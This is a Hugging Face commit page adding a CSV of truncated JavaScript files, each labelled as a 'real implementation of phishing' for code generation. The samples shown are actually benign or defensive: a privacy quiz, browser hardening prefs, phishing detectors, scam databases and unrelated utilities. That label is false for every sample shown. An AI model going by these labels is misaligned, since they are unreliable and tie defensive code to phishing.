Basti1110 commited on
Commit
36d694e
·
verified ·
1 Parent(s): c941b17

Upload 4 files

Browse files
code_dataset_20250522_220104.csv ADDED
@@ -0,0 +1,1724 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ task,problem_title,problem_description,sample_solution,language,repo_name,timestamp,split
2
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* Author: Selvahini Kamalarajan
3
+ Date: December 5, 2023
4
+ File Name: script
5
+ Description: Informational website about the implications of privacy and information technology usage */
6
+
7
+ function phishing() {
8
+ // Function to display correct answer for phishing email question
9
+ var question = document.quiz2.question.value;
10
+
11
+ if (question == ""yes"") {
12
+ document.getElementById(""message"").innerHTML = ""Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate."";
13
+ }
14
+
15
+ if (question == ""no"") {
16
+ document.getElementById(""message"").innerHTML = ""Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities."";
17
+ }
18
+ document.getElementById(""after_submit"").style.visibility = ""visible""; //Set element visibility to visible
19
+ }
20
+
21
+ function check() {
22
+ // Function to check answers for Privacy Policy Question
23
+ var question = document.quiz.question.value;
24
+
25
+ // Output message and picture if user answers yes/no
26
+ if (question == ""yes"") {
27
+ document.getElementById(""message"").innerHTML = ""Nice! You are one of 9% of people who read privacy policies often."";
28
+ document.getElementById(""picture"").src = ""policy.png"";
29
+ }
30
+
31
+ if (question == ""no"") {
32
+ document.getElementById(""message"").innerHTML = ""Just like you, 91% of consumers accept the terms and conditions without reading them."";
33
+ document.getElementById(""picture"").src = ""policies-stats.jpg"";
34
+ }
35
+ document.getElementById(""after_submit"").style.visibility = ""visible"";
36
+ }
37
+
38
+ function checkAns() {
39
+ // Function to check answers for quiz
40
+ var correctAns = [""b"", ""b"", ""a"", ""d"", ""b"", ""d"", ""b"", ""b"", ""c"", ""d""];
41
+
42
+ var correct = 0;
43
+
44
+ var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen",Javascript,selvxhini-10/PersonalPrivacyWebsite,2025-05-22T22:01:00.115247,training
45
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"//
46
+ /******************************************************************************
47
+ * user.js *
48
+ * https://github.com/pyllyukko/user.js *
49
+ ******************************************************************************/
50
+
51
+ /******************************************************************************
52
+ * SECTION: HTML5 / APIs / DOM *
53
+ ******************************************************************************/
54
+
55
+ // PREF: Disable Service Workers
56
+ // https://developer.mozilla.org/en-US/docs/Web/API/Worker
57
+ // https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorker_API
58
+ // https://wiki.mozilla.org/Firefox/Push_Notifications#Service_Workers
59
+ // NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...)
60
+ // NOTICE: Disabling ServiceWorkers breaks Firefox Sync
61
+ // Unknown security implications
62
+ // CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed)
63
+ user_pref(""dom.serviceWorkers.enabled"", false);
64
+
65
+ // PREF: Disable web notifications
66
+ // https://support.mozilla.org/en-US/questions/1140439
67
+ user_pref(""dom.webnotifications.enabled"", false);
68
+
69
+ // PREF: Disable DOM timing API
70
+ // https://wiki.mozilla.org/Security/Reviews/Firefox/NavigationTimingAPI
71
+ // https://www.w3.org/TR/navigation-timing/#privacy
72
+ // NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https://github.com/pyllyukko/user.js/issues/561)
73
+ user_pref(""dom.enable_performance"", false);
74
+
75
+ // PREF: Disable resource timing API
76
+ // https://www.w3.org/TR/resource-timing/#privacy-security
77
+ // NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare)
78
+ user_pref(""dom.enable_resource_timing"", false);
79
+
80
+ // PREF: Make sure the User Timing API does not provide a new high resolution timestamp
81
+ // https://trac.torproject.org/projects/tor/ticket/16336
82
+ // https://www.w3.org/TR/2013/REC-user-timing-2",Javascript,pyllyukko/user.js,2025-05-22T22:01:00.249678,training
83
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"export class PhishingDetector {
84
+ constructor() {
85
+ // No need to check for ai.languageModel here
86
+ // We'll handle capability checks when we use the model
87
+ }
88
+
89
+ async calculateScore(emailContent) {
90
+ try {
91
+ // Log emailContent for debugging
92
+ console.log('Email content received:', emailContent);
93
+
94
+ const features = this.analyzeEmailFeatures(emailContent);
95
+
96
+ // Check if the language model is available
97
+ const capabilities = await ai.languageModel.capabilities();
98
+
99
+ if (capabilities.available !== ""readily"") {
100
+ console.warn('Language model is not readily available');
101
+
102
+ if (capabilities.consent === ""granted"") {
103
+ console.log('Consent already granted.');
104
+ } else if (capabilities.consent === ""requirable"") {
105
+ // Request user consent
106
+ const consentResult = await ai.languageModel.requestConsent();
107
+ if (!consentResult) {
108
+ console.warn('User did not grant consent');
109
+ return 50; // Return a default score or handle accordingly
110
+ } else {
111
+ console.log('User granted consent.');
112
+ }
113
+ } else {
114
+ console.warn('Consent is not available.');
115
+ return 50; // Return a default score or handle accordingly
116
+ }
117
+ }
118
+
119
+ // Generate the prompt
120
+ const prompt = `
121
+
122
+ Instructions:
123
+ - Considering the above information, assign a phishing likelihood score and provide a detailed explanation.
124
+ - Use English and Arabic numerals.
125
+ - Return the result in the format ""The score is the following: X"", where X is a number between 0 and 100.
126
+ Analyze this email for phishing indicators and provide a response in the following format:
127
+
128
+ The score is the following: X
129
+
130
+ The explanation is: [Your detailed analysis here]
131
+ End of explanation.
132
+
133
+ Consider these factors:
134
+ - Urgency or pressure tactics
135
+ - Grammar and spelling errors
136
+ - Suspicious links or attachments
137
+ - Requests for sensitive information
138
+ - Mismatched or fake sender addresses
139
+ - Time sent ",Javascript,Dalosuuu/GmailPhishGuardian_AI,2025-05-22T22:01:00.434292,training
140
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"'use strict'
141
+
142
+ const chromeLauncher = require('chrome-launcher')
143
+ const path = require('path')
144
+
145
+ // Borrow from here:
146
+ // https://github.com/GoogleChrome/puppeteer/blob/master/lib/Launcher.js#L30
147
+ const DEFAULT_ARGS = [
148
+ '--disable-background-networking',
149
+ '--disable-background-timer-throttling',
150
+ '--disable-client-side-phishing-detection',
151
+ '--disable-default-apps',
152
+ '--disable-hang-monitor',
153
+ '--disable-popup-blocking',
154
+ '--disable-prompt-on-repost',
155
+ '--disable-sync',
156
+ '--enable-automation',
157
+ '--enable-devtools-experiments',
158
+ '--metrics-recording-only',
159
+ '--no-first-run',
160
+ '--password-store=basic',
161
+ '--safebrowsing-disable-auto-update',
162
+ '--use-mock-keychain',
163
+ ]
164
+
165
+ // borrow from: http://qiita.com/saekis/items/c2b41cd8940923863791
166
+ function escapeHtml (string) {
167
+ if (typeof string !== 'string') {
168
+ return string
169
+ }
170
+ return string.replace(/[&'`""<>]/g, function (match) {
171
+ return {
172
+ '&': '&amp;',
173
+ '\'': '&#x27;',
174
+ '`': '&#x60;',
175
+ '""': '&quot;',
176
+ '<': '&lt;',
177
+ '>': '&gt;',
178
+ }[match]
179
+ })
180
+ }
181
+
182
+ function escapeSingleQuote (string) {
183
+ if (typeof string !== 'string') {
184
+ return string
185
+ }
186
+ return string.replace(/'/g, '\\\'')
187
+ }
188
+
189
+ function escapeNewLine (string) {
190
+ return string.replace(/\r?\n/g, '\\n')
191
+ }
192
+
193
+ async function createChromeLauncher (startingUrl, options) {
194
+ const flags = [].concat(DEFAULT_ARGS)
195
+ let chromeInstance
196
+
197
+ // Lighthouse adds '--disable-setuid-sandbox' flag automatically.
198
+ // The flag causes an error on linux when staring headless chrome.
199
+ // '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'.
200
+ if (process.platform === 'linux') {
201
+ flags.push('--no-sandbox')
202
+ }
203
+ if (!options.visible) {
204
+ flags.push('--headless')
205
+ flags.push('--hide-scrollbars')
206
+ flags.push('--mute-audio')
207
+ }
208
+ if (options.chromeFlags && Array.isArray(options.chromeFlags)) {
209
+ options.chromeFlags.forEach(f => {
210
+ if (f.indexOf('--') === -1) {
211
+ throw new Error('An item of chromFlags option",Javascript,OnetapInc/chromy,2025-05-22T22:01:00.573851,training
212
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// eslint-disable-next-line no-undef
213
+ docute.init({
214
+ debug: true,
215
+ title: 'Spam Scanner',
216
+ repo: 'spamscanner/spamscanner',
217
+ 'edit-link': 'https://github.com/spamscanner/spamscanner/tree/master/',
218
+ twitter: 'niftylettuce',
219
+ nav: {
220
+ default: [
221
+ {
222
+ title:
223
+ 'The best anti-spam, email filtering, and phishing prevention service.',
224
+ path: '/'
225
+ }
226
+ ]
227
+ },
228
+ // eslint-disable-next-line no-undef
229
+ plugins: [docuteEmojify()]
230
+ });
231
+ ",Javascript,spamscanner/spamscanner,2025-05-22T22:01:00.710474,training
232
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"
233
+
234
+ // this is the code which will be injected into a given page...
235
+ var config = {
236
+ apiKey: ""AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ"",
237
+ authDomain: ""phish-ai-production.firebaseapp.com"",
238
+ databaseURL: ""https://phish-ai-production.firebaseio.com"",
239
+ projectId: ""phish-ai-production"",
240
+ storageBucket: ""gs://phish-ai-production.appspot.com/"",
241
+ messagingSenderId: ""976092427021""
242
+ };
243
+ firebase.initializeApp(config);
244
+ var db = firebase.firestore();
245
+
246
+
247
+ function open_options_page() {
248
+ chrome.tabs.create({'url': ""/options.html"" } )
249
+ };
250
+
251
+ function open_demo_page() {
252
+ chrome.tabs.create({'url': ""https://www.phish.ai/request-a-demo"" } )
253
+ };
254
+
255
+ function restore_popup() {
256
+ chrome.storage.local.get({
257
+ idnEnable: true,
258
+ aiEnable: true
259
+ }, function(items) {
260
+ if (!items.aiEnable) {
261
+ document.getElementById('zero_day_disabled').style.display = """"
262
+ }
263
+ if (!items.idnEnable) {
264
+ document.getElementById('idn_disabled').style.display = """"
265
+ }
266
+ var bg = chrome.extension.getBackgroundPage();
267
+ var query = {active: true, currentWindow: true};
268
+ chrome.tabs.query(query, function callback(tabs) {
269
+ if (items.idnEnable) {
270
+ var currentTab = tabs[0]; // there will be only one in this array
271
+ var hostname = bg.extractHostname(currentTab.url);
272
+ var domain = document.getElementById('domain');
273
+ var idn_status = document.getElementById('idn_status');
274
+ if (bg.isDomainIDN(hostname)) {
275
+ domain.className = 'badge badge-danger';
276
+ idn_status.className = 'badge badge-danger';
277
+ idn_status.innerHTML = 'IDN Detected';
278
+ }
279
+ domain.innerHTML = hostname;
280
+ }
281
+
282
+ if (items.aiEnable) {
283
+ if (currentTab.id in bg.tabMalicious) {
284
+ var zero_day = document.getElementById('zero_day');
285
+ var ta",Javascript,phishai/phish-protect,2025-05-22T22:01:00.830022,training
286
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"respecConfig.localBiblio = {
287
+ ""aicaptcha"": {
288
+ ""title"": ""aiCaptcha: Using AI to beat CAPTCHA and post comment spam"",
289
+ ""date"": """",
290
+ ""authors"": [""Casey Chesnut""],
291
+ ""editors"": [],
292
+ ""etAl"": false,
293
+ ""publisher"": """",
294
+ ""href"": ""http://www.brains-n-brawn.com/default.aspx?vDir=aicaptcha""
295
+ },
296
+
297
+ ""able-gamers"": {
298
+ ""title"": ""Thought On Accessibility and VR"",
299
+ ""date"": ""March, 2017"",
300
+ ""authors"": [""AJ Ryan""],
301
+ ""editors"": [],
302
+ ""etAl"": false,
303
+ ""publisher"": """",
304
+ ""href"": ""https://ablegamers.org/thoughts-on-accessibility-and-vr/""
305
+ },
306
+
307
+ ""antiphishing"": {
308
+ ""title"": ""Phishing Activity Trends Report"",
309
+ ""date"": ""July, 2005"",
310
+ ""authors"": [],
311
+ ""editors"": [],
312
+ ""etAl"": false,
313
+ ""publisher"": ""Anti-Phishing Working Group"",
314
+ ""href"": ""http://antiphishing.org/APWG_Phishing_Activity_Report_Jul_05.pdf""
315
+ },
316
+ ""breaking"": {
317
+ ""title"": ""Breaking CAPTCHAs Without Using OCR"",
318
+ ""date"": """",
319
+ ""authors"": [""Howard Yeend""],
320
+ ""editors"": [],
321
+ ""etAl"": false,
322
+ ""publisher"": """",
323
+ ""href"": ""http://www.cs.berkeley.edu/%7Emori/gimpy/gimpy.html""
324
+ },
325
+ ""breakingocr"": {
326
+ ""title"": ""Breaking CAPTCHAs Without Using OCR"",
327
+ ""date"": """",
328
+ ""authors"": [""Howard Yeend""],
329
+ ""editors"": [],
330
+ ""etAl"": false,
331
+ ""publisher"": """",
332
+ ""href"": ""http://www.puremango.co.uk/cm_breaking_captcha_115.php""
333
+ },
334
+ ""chafee"": {
335
+ ""title"": ""17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)"",
336
+ ""date"": """",
337
+ ""authors"": [],
338
+ ""editors"": [],
339
+ ""etAl"": false,
340
+ ""publisher"": """",
341
+ ""href"": ""https://www.copyright.gov/title17/92chap1.html""
342
+ },
343
+ ""captcha-ocr"": {
344
+ ""title"": ""CAPTCHA: Attacks and Weaknesses against OCR technology"",
345
+ ""date"": ""2013"",
346
+ ""authors"": [
347
+ ""Silky Azad"", ""Kiran Jain""],
348
+ ""publisher"": ""Journal of Computer science and Technology"",
349
+ ""etAl"": false,
350
+ ""editors"": [],
351
+ ""href"": ""https://computerresearch.org/index.php/computer/article/download/368/368""
352
+ },
353
+ ""information-security"": {
354
+ ""ti",Javascript,w3c/apa,2025-05-22T22:01:01.006796,training
355
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"'use strict';
356
+
357
+ const fs = require('fs-extra');
358
+ const debug = require('debug')('app');
359
+ const express = require('express');
360
+ const csp = require('express-csp-header');
361
+ const frameguard = require('frameguard');
362
+ const xssFilter = require('x-xss-protection');
363
+ const bodyParser = require('body-parser');
364
+ const url = require('url');
365
+ const dateFormat = require('dateformat');
366
+ const {fork} = require('child_process');
367
+ const download = require('download-file');
368
+ const rimraf = require('rimraf');
369
+ const phishingDetector = require('eth-phishing-detect/src/detector');
370
+ const crypto = require(""crypto"");
371
+ const request = require('request');
372
+ const app = express();
373
+ const config = require('./config');
374
+ const check = require('./_utils/webcheck.js');
375
+ const lookup = require('./_utils/lookup.js');
376
+
377
+
378
+ let default_template = fs.readFileSync('./_layouts/default.html', 'utf8');
379
+ let cache;
380
+ let updating_now = false;
381
+ let icon_warnings = [];
382
+ var older_cache_time;
383
+
384
+
385
+ if('perform_dns_lookup' in config && config.perform_dns_lookup === false) {
386
+ default_template = default_template.replace(""{{ config.perform_dns_lookup }}"", ""<div class='ui info message'>DNS lookups not performed due to configuration.</div><br />"");
387
+ } else {
388
+ default_template = default_template.replace(""{{ config.perform_dns_lookup }}"", '');
389
+ }
390
+
391
+ /* See if there's an up-to-date cache, otherwise run `update.js` to create one. */
392
+ function getCache(callback = false) {
393
+ if (!fs.existsSync('_cache/cache.json')) {
394
+ debug(""No cache file found. Creating one..."");
395
+ if (callback) {
396
+ if (!updating_now) {
397
+ updating_now = true;
398
+ fork('update.js');
399
+ }
400
+ var checkDone = setInterval(function() {
401
+ if (fs.existsSync('_cache/cache.json')) {
402
+ updating_now = false;
403
+ cache = JSON.parse(fs.readFileSync('_cache/cache.json'));
404
+ clearInterval(checkDone);
405
+ debug(""Successfully updated cache!"");
406
+ ",Javascript,MrLuit/EtherScamDB,2025-05-22T22:01:01.099275,training
407
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/**
408
+ * Github
409
+ * https://github.com/6IX7ine/certstreamcatcher
410
+ *
411
+ * Copyright (c) 2017 Fábio Castro
412
+ * Licensed under the MIT license.
413
+ */
414
+
415
+ 'use strict'
416
+
417
+ const tld = require('tldjs');
418
+ const lodash = require('lodash');
419
+ const color = require('cli-color');
420
+ const status = require('node-status');
421
+ const punycode = require('punycode');
422
+
423
+ const yellow = color.yellow.underline;
424
+ const danger = color.redBright.underline;
425
+ const white = color.white.underline;
426
+
427
+ const certificates = status.addItem('certificates');
428
+
429
+ const mapping = {
430
+
431
+ ""a"": [""à"", ""á"", ""â"", ""ã"", ""ä"", ""å"", ""ā"", ""ă"", ""ą"", ""ǎ"", ""ȁ"", ""ȃ"", ""ȧ"", ""ḁ"", ""ẚ"", ""ạ""],
432
+ ""b"": [""ḃ"", ""ḅ"", ""ḇ"", ""ƀ""],
433
+ ""c"": [""ç"", ""ć"", ""ĉ"", ""ċ"", ""č""],
434
+ ""d"": [""ḋ"", ""ḍ"", ""ḏ"", ""ḑ"", ""ḓ"", ""đ""],
435
+ ""e"": [""è"", ""é"", ""ê"", ""ë"", ""ĕ"", ""ė"", ""ę"", ""ě"", ""ȅ"", ""ȇ"", ""ȩ"", ""ḙ"", ""ḛ"", ""ẹ"", ""ẽ""],
436
+ ""f"": [""ḟ""],
437
+ ""g"": [""ĝ"", ""ğ"", ""ġ"", ""ģ"", ""ǧ"", ""ǵ"", ""ḡ""],
438
+ ""h"": [""ĥ"", ""ȟ"", ""ḣ"", ""ḥ"", ""ḧ"", ""ḩ"", ""ḫ"", ""ẖ""],
439
+ ""i"": [""ì"", ""í"", ""î"", ""ï"", ""ĩ"", ""ī"", ""ĭ"", ""į"", ""ǐ"", ""ȉ"", ""ȋ"", ""ḭ"", ""ị""],
440
+ ""j"": [""ĵ"", ""ǰ""],
441
+ ""k"": [""ķ"", ""ǩ"", ""ḱ"", ""ḳ"", ""ḵ""],
442
+ ""l"": [""ĺ"", ""ļ"", ""ľ"", ""ŀ"", ""ḷ"", ""ḻ"", ""ḽ"", ""ι"", ""ł""],
443
+ ""m"": [""ḿ"", ""ṁ"", ""ṃ"", ""ϻ""],
444
+ ""n"": [""ñ"", ""ń"", ""ņ"", ""ň"", ""ʼn"", ""ǹ"", ""ṅ"", ""ṇ"", ""ṉ"", ""ṋ""],
445
+ ""o"": [""ò"", ""ó"", ""ô"", ""õ"", ""ö"", ""ō"", ""ŏ"", ""ő"", ""ơ"", ""ǒ"", ""ǫ"", ""ố"", ""ȍ"", ""ȏ"", ""ȯ"", ""ọ"", ""ø"", ""ộ""],
446
+ ""p"": [""ṕ"", ""ṗ"", ""ϸ""],
447
+ ""r"": [""ŕ"", ""ŗ"", ""ř"", ""ȑ"", ""ȓ"", ""ṙ"", ""ṛ"", ""ṟ"", ""ґ""],
448
+ ""s"": [""ŝ"", ""ş"", ""š"", ""ș"", ""ṡ"", ""ṣ""],
449
+ ""t"": [""ţ"", ""ť"", ""ț"", ""ṫ"", ""ṭ"", ""ṯ"", ""ṱ"", ""ẗ""],
450
+ ""u"": [""ù"", ""ú"", ""û"", ""ü"", ""ũ"", ""ū"", ""ŭ"", ""ů"", ""ű"", ""ų"", ""ư"", ""ǔ"", ""ȕ"", ""ȗ"", ""ṳ"", ""ṵ"", ""ṷ"", ""ụ""],
451
+ ""v"": [""ṽ"", ""ṿ""],
452
+ ""w"": [""ŵ"", ""ẁ"", ""ẃ"", ""ẅ"", ""ẇ"", ""ẉ"", ""ẘ""],
453
+ ""x"": [""ẋ"", ""ẍ""],
454
+ ""y"": [""ý"", ""ÿ"", ""ŷ"", ""ȳ"", ""ẏ"", ""ẙ"", ""ỳ"", ""ỵ"", ""ỹ""],
455
+ ""z"": [""ź"", ""ż"", ""ž"", ""ẑ"", ""ẓ"", ""ẕ""]
456
+ }
457
+
458
+ module.exports = {
459
+
460
+ certstreamClientPhishing: function (certstream, regex, tlds, options) {
461
+
462
+ this.certstream = certstream;
463
+ this.regex = regex;
464
+ this.tlds = tlds;
465
+
466
+
467
+ let settings = { tlds: false };
468
+
469
+ if (!op",Javascript,jimywork/certstreamcatcher,2025-05-22T22:01:01.244357,training
470
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// Redirecting to links from the book:
471
+ // https://nooffice.link/REDIRECT
472
+ // which translates to https://nooffice.org/redirect?to=REDIRECT
473
+
474
+ let links = new Map([
475
+
476
+ //list of REDIRECT links
477
+ ['nooffice', 'https://nooffice.org'],
478
+
479
+
480
+ //chapter 19
481
+ ['ocr', 'https://en.wikipedia.org/wiki/Optical_character_recognition'],
482
+ ['evernote','https://Evernote.com'],
483
+ ['swiftscan', 'https://swiftscan.app/en/index.html'],
484
+ ['ios-scan', 'https://support.apple.com/en-us/HT210336'],
485
+ ['dropbox', 'https://www.dropbox.com'],
486
+ ['box', 'https://box.com'],
487
+ ['gdrive', 'https://drive.google.com'],
488
+ ['onedrive', 'https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage'],
489
+ ['iwork', 'https://www.apple.com/iwork/'],
490
+ ['gsheets', 'https://www.google.com/sheets/about/'],
491
+ ['excel', 'https://www.microsoft.com/en-us/microsoft-365/excel'],
492
+ ['mfa', 'https://en.wikipedia.org/wiki/Multi-factor_authentication'],
493
+ ['messages', 'https://support.apple.com/explore/messages'],
494
+ ['signal', 'https://www.signal.org'],
495
+ ['telegram', 'https://telegram.org'],
496
+ ['whatsapp', 'https://www.whatsapp.com'],
497
+ ['ipadonly', 'https://ipadonly.com/book/'],
498
+ ['vpn', 'https://en.wikipedia.org/wiki/Virtual_private_network'],
499
+ ['github', 'https://nooffice.org/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455/'],
500
+
501
+ //chapter 20
502
+
503
+ ['conversation', 'https://en.wikipedia.org/wiki/A_Little_Less_Conversation'],
504
+ ['slack', 'https://slack.com'],
505
+ ['msteams', 'https://www.microsoft.com/en-us/microsoft-365/microsoft-teams/group-chat-software'],
506
+ ['cognitive', 'https://www.pnas.org/content/106/37/15583'],
507
+ ['digital-minimalism', 'https://www.calnewport.com/books/digital-minimalism/'],
508
+
509
+ //chapter 21
510
+ ['offices', 'https://sliwinski.com/tag/office'],
511
+ ['cabinet', 'https://sliwinski.com/declutter-your-desk-why-i-love-my-clutter-fre/'],
512
+ ['stand', 'https://michael.team/myoffice/'],
513
+ ['whiteboard', 'https://sliwinski.com/whiteboard/'],
514
+
515
+ //chapter 22
516
+
517
+
518
+ //chapter 23
519
+ ['basecamphires', 'https://m.signa",Javascript,Nozbe/NoOffice.org,2025-05-22T22:01:01.359520,training
520
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* OpenID for node.js
521
+ *
522
+ * http://ox.no/software/node-openid
523
+ * http://github.com/havard/node-openid
524
+ *
525
+ * Copyright (C) 2010 by Håvard Stranden
526
+ *
527
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
528
+ * of this software and associated documentation files (the ""Software""), to deal
529
+ * in the Software without restriction, including without limitation the rights
530
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
531
